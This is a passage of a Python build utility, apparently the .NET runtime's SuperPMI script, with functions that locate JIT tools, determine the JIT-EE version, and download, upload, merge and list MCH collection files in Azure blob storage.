# set the current directory to Core_Root before running superpmi.
if not os.path.isdir(coreclr_args.core_root):
logging.warning("Warning: Core_Root does not exist at \"%s\"; creating it now", coreclr_args.core_root)
os.makedirs(coreclr_args.core_root)
coredistools_uri = az_blob_storage_superpmi_container_uri + "/libcoredistools/{}-{}/{}".format(coreclr_args.host_os.lower(), coreclr_args.arch.lower(), coredistools_dll_name)
logging.info("Download: %s -> %s", coredistools_uri, coredistools_location)
urllib.request.urlretrieve(coredistools_uri, coredistools_location)
assert os.path.isfile(coredistools_location)
return coredistools_location
def determine_pmi_location(coreclr_args):
""" Determine pmi.dll location, using the following steps:
First, use the `-pmi_location` argument, if set.
Else, look for pmi.dll on the PATH. This will be true if you build jitutils yourself
and put the built `bin` directory on your PATH.
Else, look for pmi.dll in Core_Root. This is where we cache it if downloaded from Azure Storage.
Otherwise, download a cached copy from CLRJIT Azure Storage and cache it in Core_Root.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
pmi_location (str) : path of pmi.dll
"""
if coreclr_args.pmi_location is not None:
pmi_location = os.path.abspath(coreclr_args.pmi_location)
if not os.path.isfile(pmi_location):
raise RuntimeError("PMI not found at {}".format(pmi_location))
logging.info("Using PMI at %s", pmi_location)
else:
path_var = os.environ.get("PATH")
pmi_location = find_file("pmi.dll", path_var.split(os.pathsep)) if path_var is not None else None
if pmi_location is not None:
logging.info("Using PMI found on PATH at %s", pmi_location)
else:
pmi_location = os.path.join(coreclr_args.core_root, "pmi.dll")
if os.path.isfile(pmi_location):
logging.info("Using PMI found at %s", pmi_location)
else:
pmi_uri = az_blob_storage_superpmi_container_uri + "/pmi/pmi.dll"
logging.info("Download: %s -> %s", pmi_uri, pmi_location)
urllib.request.urlretrieve(pmi_uri, pmi_location)
assert os.path.isfile(pmi_location)
return pmi_location
def determine_jit_name(coreclr_args):
""" Determine the jit based on the OS. If "-jit_name" is specified, then use the specified jit.
This function is called for cases where the "-jit_name" flag is not used, so be careful not
to depend on the "jit_name" attribute existing.
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) : name of the jit for this OS
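For example, this returns "clrjit.dll" on windows, "libclrjit.so" on Linux,
and "libclrjit.dylib" on OSX.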
"""
# If `-jit_name` is used, it must be given a full filename, not just a "base name", so use it without additional processing.
if hasattr(coreclr_args, "jit_name") and coreclr_args.jit_name is not None:
return coreclr_args.jit_name
jit_base_name = "clrjit"
if coreclr_args.host_os == "OSX":
return "lib" + jit_base_name + ".dylib"
elif coreclr_args.host_os == "Linux":
return "lib" + jit_base_name + ".so"
elif coreclr_args.host_os == "windows":
return jit_base_name + ".dll"
else:
raise RuntimeError("Unknown OS.")
def find_tool(coreclr_args, tool_name, search_core_root=True, search_product_location=True, search_path=True, throw_on_not_found=True):
""" Find a tool or any specified file (e.g., clrjit.dll) and return the full path to that tool if found.
Args:
coreclr_args (CoreclrArguments): parsed args
tool_name (str): tool to find, e.g., "superpmi.exe"
search_core_root (bool): True to search the Core_Root folder
search_product_location (bool): True to search the build product folder
search_path (bool): True to search along the PATH
throw_on_not_found (bool): True to raise an exception if the tool is not found; False to return None
Return:
(str) Full path of the tool, or None if not found.
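Example (illustrative; the tool name varies by OS):
superpmi_path = find_tool(coreclr_args, "superpmi.exe")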
"""
# First, look in Core_Root, if there is one.
if search_core_root and hasattr(coreclr_args, "core_root") and coreclr_args.core_root is not None and os.path.isdir(coreclr_args.core_root):
tool_path = os.path.join(coreclr_args.core_root, tool_name)
if os.path.isfile(tool_path):
logging.debug("Using %s from Core_Root: %s", tool_name, tool_path)
return tool_path
# Next, look in the built product directory, if it exists. We can use superpmi/mcs directly from the
# product build directory instead of from Core_Root because they don't depend on managed code libraries.
if search_product_location and hasattr(coreclr_args, "product_location") and coreclr_args.product_location is not None and os.path.isdir(coreclr_args.product_location):
tool_path = os.path.join(coreclr_args.product_location, tool_name)
if os.path.isfile(tool_path):
logging.debug("Using %s from product build location: %s", tool_name, tool_path)
return tool_path
# Finally, look on the PATH
if search_path:
path_var = os.environ.get("PATH")
if path_var is not None:
tool_path = find_file(tool_name, path_var.split(os.pathsep))
if tool_path is not None:
logging.debug("Using %s from PATH: %s", tool_name, tool_path)
return tool_path
if throw_on_not_found:
raise RuntimeError("Tool " + tool_name + " not found. Have you built the runtime repo and created a Core_Root, or put it on your PATH?")
return None
def determine_superpmi_tool_name(coreclr_args):
""" Determine the superpmi tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the superpmi tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "superpmi"
elif coreclr_args.host_os == "windows":
return "superpmi.exe"
else:
raise RuntimeError("Unknown OS.")
def determine_superpmi_tool_path(coreclr_args):
""" Determine the superpmi tool full path
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Path of the superpmi tool to use
"""
superpmi_tool_name = determine_superpmi_tool_name(coreclr_args)
return find_tool(coreclr_args, superpmi_tool_name)
def determine_mcs_tool_name(coreclr_args):
""" Determine the mcs tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the mcs tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "mcs"
elif coreclr_args.host_os == "windows":
return "mcs.exe"
else:
raise RuntimeError("Unsupported OS.")
def determine_mcs_tool_path(coreclr_args):
""" Determine the mcs tool full path
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Path of the mcs tool to use
"""
mcs_tool_name = determine_mcs_tool_name(coreclr_args)
return find_tool(coreclr_args, mcs_tool_name)
def determine_dotnet_tool_name(coreclr_args):
""" Determine the dotnet tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the dotnet tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "dotnet"
elif coreclr_args.host_os == "windows":
return "dotnet.exe"
else:
raise RuntimeError("Unsupported OS.")
def determine_jit_ee_version(coreclr_args):
""" Determine the JIT-EE version to use.
The JIT-EE version is used for determining which MCH files to download and use. It is determined as follows:
1. Try to parse it out of the source code. If we can find src\\coreclr\\inc\\jiteeversionguid.h in the source
tree (and we're already assuming we can find the repo root from the relative path of this script),
then the JIT-EE version lives in jiteeversionguid.h as follows:
constexpr GUID JITEEVersionIdentifier = { /* a5eec3a4-4176-43a7-8c2b-a05b551d4f49 */
0xa5eec3a4,
0x4176,
0x43a7,
{0x8c, 0x2b, 0xa0, 0x5b, 0x55, 0x1d, 0x4f, 0x49}
};
We want the string between the /* */ comments.
2. Find the mcs tool and run "mcs -printJITEEVersion".
3. Otherwise, just use "unknown-jit-ee-version", which will probably cause downstream failures.
NOTE: When using mcs, we need to run the tool. So we need a version that will run. If a user specifies
an "-arch" argument that creates a Core_Root path that won't run, like an arm32 Core_Root on an
x64 machine, this won't work. This could happen if doing "upload" or "list-collections" on
collections from a machine that didn't create the native collections. We should create a "native"
Core_Root and use that in case there are "cross-arch" scenarios.
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) The JIT-EE version to use
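For example, given the JITEEVersionIdentifier declaration shown above, the
version string extracted and returned would be "a5eec3a4-4176-43a7-8c2b-a05b551d4f49".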
"""
jiteeversionguid_h_path = os.path.join(coreclr_args.coreclr_dir, "inc", "jiteeversionguid.h")
if os.path.isfile(jiteeversionguid_h_path):
# The string is near the beginning of the somewhat large file, so just read a line at a time when searching.
with open(jiteeversionguid_h_path, 'r') as file_handle:
for line in file_handle:
match_obj = re.search(r'^constexpr GUID JITEEVersionIdentifier *= *{ */\* *([^ ]*) *\*/', line)
if match_obj is not None:
jiteeversionguid_h_jit_ee_version = match_obj.group(1)
jiteeversionguid_h_jit_ee_version = jiteeversionguid_h_jit_ee_version.lower()
logging.info("Using JIT/EE Version from jiteeversionguid.h: %s", jiteeversionguid_h_jit_ee_version)
return jiteeversionguid_h_jit_ee_version
logging.warning("Warning: couldn't find JITEEVersionIdentifier in %s; is the file corrupt?", jiteeversionguid_h_path)
mcs_path = determine_mcs_tool_path(coreclr_args)
command = [mcs_path, "-printJITEEVersion"]
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_jit_ee_version, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
mcs_jit_ee_version = stdout_jit_ee_version.decode('utf-8').strip()
mcs_jit_ee_version = mcs_jit_ee_version.lower()
logging.info("Using JIT/EE Version from mcs: %s", mcs_jit_ee_version)
return mcs_jit_ee_version
# Otherwise, use the default "unknown" version.
default_jit_ee_version = "unknown-jit-ee-version"
logging.info("Using default JIT/EE Version: %s", default_jit_ee_version)
return default_jit_ee_version
def print_platform_specific_environment_vars(loglevel, coreclr_args, var, value):
""" Print environment variables as set {}={} or export {}={}
Args:
loglevel (int): logging level at which to print, e.g., logging.INFO
coreclr_args (CoreclrArguments): parsed args
var (str): variable to set
value (str): value being set.
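Example (with an illustrative variable and value):
print_platform_specific_environment_vars(logging.INFO, coreclr_args, "COMPlus_JitDump", "*")
logs "set COMPlus_JitDump=*" on windows and "export COMPlus_JitDump=*" elsewhere.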
"""
if coreclr_args.host_os == "windows":
logging.log(loglevel, "set %s=%s", var, value)
else:
logging.log(loglevel, "export %s=%s", var, value)
def list_superpmi_collections_container_via_rest_api(url_filter=lambda unused: True):
""" List the superpmi collections using the Azure Storage REST api
Args:
url_filter (lambda: string -> bool): filter to apply to the list. The filter takes a URL and returns True if this URL is acceptable.
Returns:
urls (list): set of collection URLs in Azure Storage that match the filter.
Notes:
This method does not require installing the Azure Storage python package.
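Example (hypothetical filter): to list only the zipped MCH collections:
urls = list_superpmi_collections_container_via_rest_api(lambda url: url.endswith(".mch.zip"))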
"""
# This URI will return *all* the blobs, for all jit-ee-version/OS/architecture combinations.
# pass "prefix=foo/bar/..." to only show a subset. Or, we can filter later using string search.
list_superpmi_container_uri = az_blob_storage_superpmi_container_uri + "?restype=container&comp=list&prefix=" + az_collections_root_folder + "/"
try:
contents = urllib.request.urlopen(list_superpmi_container_uri).read().decode('utf-8')
except Exception as exception:
logging.error("Didn't find any collections using %s", list_superpmi_container_uri)
logging.error(" Error: %s", exception)
return None
# Contents is an XML file with contents like:
#
# <EnumerationResults ContainerName="https://clrjit.blob.core.windows.net/superpmi">
# <Blobs>
# <Blob>
# <Name>jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip</Name>
# <Url>https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip</Url>
# <Properties>
# ...
# </Properties>
# </Blob>
# <Blob>
# <Name>jit-ee-guid/Linux/x64/Linux.x64.Checked.mch.zip</Name>
# <Url>https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.mch.zip</Url>
# ... etc. ...
# </Blobs>
# </EnumerationResults>
#
# We just want to extract the <Url> entries. We could use an XML parsing package, but simple
# string splitting is sufficient.
urls_split = contents.split("<Url>")[1:]
urls = []
for item in urls_split:
url = item.split("</Url>")[0].strip()
if url_filter(url):
urls.append(url)
return urls
def process_mch_files_arg(coreclr_args):
""" Process the -mch_files argument. If the argument is empty, then download files from Azure Storage.
If the argument is non-empty, check it for UNC paths and download/cache those files, replacing
them with a reference to the newly cached local paths (this is on Windows only).
Args:
coreclr_args (CoreclrArguments): parsed args
Returns:
nothing
coreclr_args.mch_files is updated
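Example (illustrative): coreclr_args.mch_files may mix local paths, UNC paths (Windows only), and URLs, e.g.:
[ "d:\\spmi\\base.mch", "\\\\server\\share\\collections", "https://clrjit.blob.core.windows.net/superpmi/<jit-ee-guid>/windows/x64/base.windows.x64.Checked.mch.zip" ]
After this function runs, all entries refer to locally cached files.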
"""
if coreclr_args.mch_files is None:
coreclr_args.mch_files = download_mch(coreclr_args, include_baseline_jit=True)
return
# Create the cache location. Note that we'll create it even if we end up not copying anything.
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
if not os.path.isdir(default_mch_dir):
os.makedirs(default_mch_dir)
# Process the mch_files list. Download and cache UNC and HTTP files.
urls = []
local_mch_files = []
for item in coreclr_args.mch_files:
# On Windows only, see if any of the mch_files are UNC paths (i.e., "\\server\share\...").
# If so, download and cache all the files found there to our usual local cache location, to avoid future network access.
if coreclr_args.host_os == "windows" and item.startswith("\\\\"):
# Special case: if the user specifies a .mch file, we'll also look for and cache a .mch.mct file next to it, if one exists.
# This happens naturally if a directory is passed and we search for all .mch and .mct files in that directory.
mch_file = os.path.abspath(item)
if os.path.isfile(mch_file) and mch_file.endswith(".mch"):
files = [ mch_file ]
mct_file = mch_file + ".mct"
if os.path.isfile(mct_file):
files.append(mct_file)
else:
files = get_files_from_path(mch_file, match_func=lambda path: any(path.endswith(extension) for extension in [".mch", ".mct"]))
for file in files:
# Download file to cache, and report that as the file to use.
cache_file = os.path.join(default_mch_dir, os.path.basename(file))
logging.info("Cache %s => %s", file, cache_file)
local_mch_file = shutil.copy2(file, cache_file)
local_mch_files.append(local_mch_file)
elif item.lower().startswith("http:") or item.lower().startswith("https:"): # probably could use urllib.parse to be more precise
urls.append(item)
else:
# Doesn't appear to be a UNC path (on Windows) or a URL, so just use it as-is.
local_mch_files.append(item)
# Download all the urls at once, and add the local cache filenames to our accumulated list of local file names.
if len(urls) != 0:
local_mch_files += download_urls(urls, default_mch_dir)
# Special case: walk the URLs list and for every ".mch" or ".mch.zip" file, check to see that either the associated ".mct" file is already
# in the list, or add it to a new list to attempt to download (but don't fail the download if it doesn't exist).
mct_urls = []
for url in urls:
if url.endswith(".mch") or url.endswith(".mch.zip"):
mct_url = url.replace(".mch", ".mch.mct")
if mct_url not in urls:
mct_urls.append(mct_url)
if len(mct_urls) != 0:
local_mch_files += download_urls(mct_urls, default_mch_dir, fail_if_not_found=False)
coreclr_args.mch_files = local_mch_files
def download_mch(coreclr_args, include_baseline_jit=False):
""" Download the mch files. This can be called to re-download files and
overwrite them in the target location.
Args:
coreclr_args (CoreclrArguments): parsed args
include_baseline_jit (bool): If True, also download the baseline jit
Returns:
list containing the directory to which the files were downloaded
"""
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
if os.path.isdir(default_mch_dir) and not coreclr_args.force_download:
# The cache directory is already there and "--force_download" was not passed, so just
# assume it's got what we want.
# NOTE: a different solution might be to verify that everything we would download is
# already in the cache, and simply not download if it is. However, that would
# require hitting the network, and currently once you've cached these, you
# don't need to do that.
logging.info("Found download cache directory \"%s\" and --force_download not set; skipping download", default_mch_dir)
return [ default_mch_dir ]
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
blob_prefix_filter = "{}/{}/{}".format(az_blob_storage_superpmi_container_uri, az_collections_root_folder, blob_filter_string).lower()
# Determine if a URL in Azure Storage should be allowed. The URL looks like:
# https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip
# Filter to just the current jit-ee-guid, OS, and architecture.
# Include both MCH and MCT files as well as the CLR JIT dll (processed below).
# If there are filters, only download those matching files.
def filter_superpmi_collections(url):
url = url.lower()
if "clrjit" in url and not include_baseline_jit:
return False
return url.startswith(blob_prefix_filter) and ((coreclr_args.filter is None) or any((filter_item.lower() in url) for filter_item in coreclr_args.filter))
urls = list_superpmi_collections_container_via_rest_api(filter_superpmi_collections)
if urls is None or len(urls) == 0:
print("No MCH files to download from {}".format(blob_prefix_filter))
return []
download_urls(urls, default_mch_dir)
return [ default_mch_dir ]
def download_urls(urls, target_dir, verbose=True, fail_if_not_found=True):
""" Download a set of files, specified as URLs, to a target directory.
If the URLs are to .ZIP files, then uncompress them and copy all contents
to the target directory.
Args:
urls (list): the URLs to download
target_dir (str): target directory where files are copied. Created if it doesn't exist.
verbose (bool): if True, log the downloads and copies as they happen
fail_if_not_found (bool): if True, fail if a download fails due to file not found (HTTP error 404).
Otherwise, ignore the failure.
Returns:
list of local filenames of downloaded files
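Example (hypothetical URL and target directory):
files = download_urls([ "https://example.com/foo.mch.zip" ], "/tmp/mch")
After the call, files would contain the extracted contents, e.g. [ "/tmp/mch/foo.mch" ].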
"""
if verbose:
logging.info("Downloading:")
for url in urls:
logging.info(" %s", url)
local_files = []
# In case we'll need a temp directory for ZIP file processing, create it first.
with TempDir() as temp_location:
for url in urls:
item_name = url.split("/")[-1]
if url.lower().endswith(".zip"):
# Delete everything in the temp_location (left over from previous iterations of this loop, i.e., previous URL downloads).
temp_location_items = [os.path.join(temp_location, item) for item in os.listdir(temp_location)]
for item in temp_location_items:
if os.path.isdir(item):
shutil.rmtree(item)
else:
os.remove(item)
download_path = os.path.join(temp_location, item_name)
try:
if verbose:
logging.info("Download: %s -> %s", url, download_path)
urllib.request.urlretrieve(url, download_path)
except urllib.error.HTTPError as httperror:
if (httperror.code == 404) and fail_if_not_found:
raise httperror
# Otherwise, swallow the error and continue to next file.
continue
if verbose:
logging.info("Uncompress %s", download_path)
with zipfile.ZipFile(download_path, "r") as file_handle:
file_handle.extractall(temp_location)
# Copy everything that was extracted to the target directory.
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
items = [ os.path.join(temp_location, item) for item in os.listdir(temp_location) if not item.endswith(".zip") ]
for item in items:
target_path = os.path.join(target_dir, os.path.basename(item))
if verbose:
logging.info("Copy %s -> %s", item, target_path)
shutil.copy2(item, target_dir)
local_files.append(target_path)
else:
# Not a zip file; download directly to the target directory
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
download_path = os.path.join(target_dir, item_name)
try:
if verbose:
logging.info("Download: %s -> %s", url, download_path)
urllib.request.urlretrieve(url, download_path)
local_files.append(download_path)
except urllib.error.HTTPError as httperror:
if (httperror.code == 404) and fail_if_not_found:
raise httperror
# Otherwise, swallow the error and continue to next file.
continue
return local_files
def upload_mch(coreclr_args):
""" Upload a set of MCH files. Each MCH file is first ZIP compressed to save data space and upload/download time.
TODO: Upload baseline altjits or cross-compile JITs?
Args:
coreclr_args (CoreclrArguments): parsed args
"""
def upload_blob(file, blob_name):
blob_client = blob_service_client.get_blob_client(container=az_superpmi_container_name, blob=blob_name)
# Check if the blob already exists, and delete it if it does, before uploading / replacing it.
try:
blob_client.get_blob_properties()
# If no exception, then the blob already exists. Delete it!
logging.warning("Warning: replacing existing blob!")
blob_client.delete_blob()
except Exception:
# Blob doesn't exist already; that's good
pass
with open(file, "rb") as data:
blob_client.upload_blob(data)
files = []
for item in coreclr_args.mch_files:
files += get_files_from_path(item, match_func=lambda path: any(path.endswith(extension) for extension in [".mch"]))
files_to_upload = []
# Special case: walk the files list and for every non-empty ".mch" file, also upload the
# associated ".mct" file if it exists and is non-empty.
for file in files.copy():
if file.endswith(".mch") and os.stat(file).st_size > 0:
files_to_upload.append(file)
mct_file = file + ".mct"
if os.path.isfile(mct_file) and os.stat(mct_file).st_size > 0:
files_to_upload.append(mct_file)
logging.info("Uploading:")
for item in files_to_upload:
logging.info(" %s", item)
try:
from azure.storage.blob import BlobServiceClient
except ImportError:
logging.error("Please install:")
logging.error(" pip install azure-storage-blob")
logging.error("See also https://docs.microsoft.com/en-us/azure/storage/blobs/storage-quickstart-blobs-python")
raise RuntimeError("Missing azure storage package.")
blob_service_client = BlobServiceClient(account_url=az_blob_storage_account_uri, credential=coreclr_args.az_storage_key)
blob_folder_name = "{}/{}/{}/{}".format(az_collections_root_folder, coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
total_bytes_uploaded = 0
with TempDir() as temp_location:
for file in files_to_upload:
# Zip compress the file we will upload
zip_name = os.path.basename(file) + ".zip"
zip_path = os.path.join(temp_location, zip_name)
logging.info("Compress %s -> %s", file, zip_path)
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.write(file, os.path.basename(file))
original_stat_result = os.stat(file)
zip_stat_result = os.stat(zip_path)
logging.info("Compressed {:n} to {:n} bytes".format(original_stat_result.st_size, zip_stat_result.st_size))
total_bytes_uploaded += zip_stat_result.st_size
blob_name = "{}/{}".format(blob_folder_name, zip_name)
logging.info("Uploading: %s (%s) -> %s", file, zip_path, az_blob_storage_superpmi_container_uri + "/" + blob_name)
upload_blob(zip_path, blob_name)
# Upload a JIT matching the MCH files just collected.
# Consider: rename uploaded JIT to include build_type
jit_location = coreclr_args.jit_location
if jit_location is None:
jit_name = determine_jit_name(coreclr_args)
jit_location = os.path.join(coreclr_args.core_root, jit_name)
assert os.path.isfile(jit_location)
jit_name = os.path.basename(jit_location)
jit_blob_name = "{}/{}".format(blob_folder_name, jit_name)
logging.info("Uploading: %s -> %s", jit_location, az_blob_storage_superpmi_container_uri + "/" + jit_blob_name)
upload_blob(jit_location, jit_blob_name)
jit_stat_result = os.stat(jit_location)
total_bytes_uploaded += jit_stat_result.st_size
logging.info("Uploaded {:n} bytes".format(total_bytes_uploaded))
def list_collections_command(coreclr_args):
""" List the SuperPMI collections in Azure Storage
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
blob_prefix_filter = "{}/{}/{}".format(az_blob_storage_superpmi_container_uri, az_collections_root_folder, blob_filter_string).lower()
# Determine if a URL in Azure Storage should be allowed. The URL looks like:
# https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip
# By default, filter to just the current jit-ee-guid, OS, and architecture.
# Only include MCH files, not clrjit.dll or MCT (TOC) files.
def filter_superpmi_collections(url: str):
url = url.lower()
return (url.endswith(".mch") or url.endswith(".mch.zip")) and (coreclr_args.all or url.startswith(blob_prefix_filter))
urls = list_superpmi_collections_container_via_rest_api(filter_superpmi_collections)
if urls is None:
return
count = len(urls)
logging.info("SuperPMI list-collections")
logging.info("")
if coreclr_args.all:
logging.info("%s collections", count)
else:
logging.info("%s collections for %s", count, blob_filter_string)
logging.info("")
for url in urls:
logging.info("%s", url)
def list_collections_local_command(coreclr_args):
""" List the SuperPMI collections local cache: where the Azure Storage collections are copied
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
# Display the blob filter string the local cache corresponds to
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
# Determine if a file should be allowed. The filenames look like:
# c:\gh\runtime\artifacts\spmi\mch\a5eec3a4-4176-43a7-8c2b-a05b551d4f49.windows.x64\corelib.windows.x64.Checked.mch
# c:\gh\runtime\artifacts\spmi\mch\a5eec3a4-4176-43a7-8c2b-a05b551d4f49.windows.x64\corelib.windows.x64.Checked.mch.mct
# Only include MCH files, not clrjit.dll or MCT (TOC) files.
def filter_superpmi_collections(path: str):
return path.lower().endswith(".mch")
if coreclr_args.all:
if not os.path.isdir(default_mch_root_dir):
logging.error("Local dir \"%s\" not found", default_mch_root_dir)
return
local_items = get_files_from_path(default_mch_root_dir)
else:
if not os.path.isdir(default_mch_dir):
logging.error("Local dir \"%s\" not found", default_mch_dir)
return
local_items = get_files_from_path(default_mch_dir)
filtered_local_items = [item for item in local_items if filter_superpmi_collections(item)]
count = len(filtered_local_items)
logging.info("SuperPMI list-collections --local")
logging.info("")
if coreclr_args.all:
logging.info("%s collections", count)
else:
logging.info("%s collections for %s", count, blob_filter_string)
logging.info("")
for item in filtered_local_items:
logging.info("%s", item)
def merge_mch(coreclr_args):
""" Merge all the files specified by a given pattern into a single output MCH file.
This is a utility function mostly for use by the CI scripting. It is a
thin wrapper around:
mcs -merge <output_mch_path> <pattern> -recursive -dedup -thin
mcs -toc <output_mch_path>
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
True on success, else False
"""
logging.info("Merging %s -> %s", coreclr_args.pattern, coreclr_args.output_mch_path)
mcs_path = determine_mcs_tool_path(coreclr_args)
command = [mcs_path, "-merge", coreclr_args.output_mch_path, coreclr_args.pattern, "-recursive", "-dedup", "-thin"]
return_code = run_and_log(command)
if return_code != 0:
logging.error("mcs -merge Failed with code %s", return_code)
return False
logging.info("Creating MCT file for %s", coreclr_args.output_mch_path)
command = [mcs_path, "-toc", coreclr_args.output_mch_path]
return_code = run_and_log(command)
if return_code != 0:
logging.error("mcs -toc Failed with code %s", return_code)
return False
return True
def get_mch_files_for_replay(coreclr_args):
""" Given the argument `mch_files`, and any specified filters, find all the MCH files to
use for replay.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
None if error (with an error message already printed), else a list of MCH files.
"""
if coreclr_args.mch_files is None:
logging.error("No MCH files specified")
return None
mch_files = []
for item in coreclr_args.mch_files:
# If there are specified filters, only run those matching files.
mch_files += get_files_from_path(item,
match_func=lambda path:
any(path.endswith(extension) for extension in [".mch"])
and ((coreclr_args.filter is None) or any(filter_item.lower() in path for filter_item in coreclr_args.filter)))
if len(mch_files) == 0:
logging.error("No MCH files found to replay")
return None
return mch_files
def process_base_jit_path_arg(coreclr_args):
""" Process the -base_jit_path argument.
If the argument is present, check it for being a path to a file.
If not present, try to find and download a baseline JIT based on the current environment:
1. Determine the current git hash using:
git rev-parse HEAD
or use the `-git_hash` argument (call the result `git_hash`).
2. Determine the baseline: the commit where this hash meets `master`, using:
git merge-base `git_hash` master
or use the `-base_git_hash` argument (call the result `base_git_hash`).
3. If the `-base_git_hash` argument is used, use that directly as the exact git
hash of the baseline JIT to use.
4. Otherwise, figure out the latest hash, starting with `base_git_hash`, that contains any changes to
the src\\coreclr\\jit directory. (We do this because the JIT rolling build only includes
builds for changes to this directory. So, this logic needs to stay in sync with the logic
that determines what causes the JIT directory to be rebuilt. E.g., it should also get
rebuilt if the JIT-EE interface GUID changes. Alternatively, we can take the entire list
of changes, and probe the rolling build drop for all of them.)
5. Check if we've already downloaded a JIT that matches `base_git_hash`, and use that if available.
6. Starting with `base_git_hash`, and possibly walking to older changes, look for matching builds
in the JIT rolling build drops.
7. If a baseline clrjit is found, download it to the `spmi/basejit/git-hash.os.architecture.build_type`
cache directory.
8. Set coreclr_args.base_jit_path to the full path to the downloaded baseline JIT.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
Nothing
coreclr_args.base_jit_path is set to the path to the JIT to use for the baseline JIT.
"""
if coreclr_args.base_jit_path is not None:
if not os.path.isfile(coreclr_args.base_jit_path):
raise RuntimeError("Specified -base_jit_path does not point to a file")
return
# We cache baseline jits under the following directory. Note that we can't create the full directory path
# until we know the baseline JIT hash.
default_basejit_root_dir = os.path.join(coreclr_args.spmi_location, "basejit")
# Run all the remaining commands, including a number of 'git' commands that use relative paths,
# from the root of the runtime repo.
with ChangeDir(coreclr_args.runtime_repo_location):
if coreclr_args.git_hash is None:
command = [ "git", "rev-parse", "HEAD" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_git_rev_parse, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
current_hash = stdout_git_rev_parse.decode('utf-8').strip()
logging.debug("Current hash: %s", current_hash)
else:
raise RuntimeError("Couldn't determine current git hash")
else:
current_hash = coreclr_args.git_hash
if coreclr_args.base_git_hash is None:
# We've got the current hash; figure out the baseline hash.
command = [ "git", "merge-base", current_hash, "master" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_git_merge_base, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
baseline_hash = stdout_git_merge_base.decode('utf-8').strip()
logging.info("Baseline hash: %s", current_hash)
else:
raise RuntimeError("Couldn't determine baseline git hash")
else:
baseline_hash = coreclr_args.base_git_hash
if coreclr_args.base_git_hash is None:
# Enumerate the last 20 changes, starting with the baseline, that included JIT changes.
command = [ "git", "log", "--pretty=format:%H", baseline_hash, "-20", "--", "src/coreclr/jit/*" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_change_list, _ = proc.communicate()
return_code = proc.returncode
change_list_hashes = []
if return_code == 0:
change_list_hashes = stdout_change_list.decode('utf-8').strip().splitlines()
else:
raise RuntimeError("Couldn't determine list of JIT changes starting with baseline hash")
if len(change_list_hashes) == 0:
raise RuntimeError("No JIT changes found starting with baseline hash")
else:
# If `-base_git_hash` is specified, then we use exactly that hash and no other for the baseline.
change_list_hashes = [ coreclr_args.base_git_hash ]
# For each hash, (1) see if we have the JIT already, and if not (2) try to download the corresponding JIT from the rolling build.
hashnum = 1
for git_hash in change_list_hashes:
logging.debug("%s: %s", hashnum, git_hash)
jit_name = determine_jit_name(coreclr_args)
basejit_dir = os.path.join(default_basejit_root_dir, "{}.{}.{}.{}".format(git_hash, coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type))
basejit_path = os.path.join(basejit_dir, jit_name)
if os.path.isfile(basejit_path):
# We found this baseline JIT in our cache; use it!
coreclr_args.base_jit_path = basejit_path
logging.info("Using baseline %s", coreclr_args.base_jit_path)
return
# It's not in our cache; is there one built by the rolling build to download?
blob_folder_name = "{}/{}/{}/{}/{}/{}".format(az_builds_root_folder, git_hash, coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type, jit_name)
blob_uri = "{}/{}".format(az_blob_storage_jitrollingbuild_container_uri, blob_folder_name)
urls = [ blob_uri ]
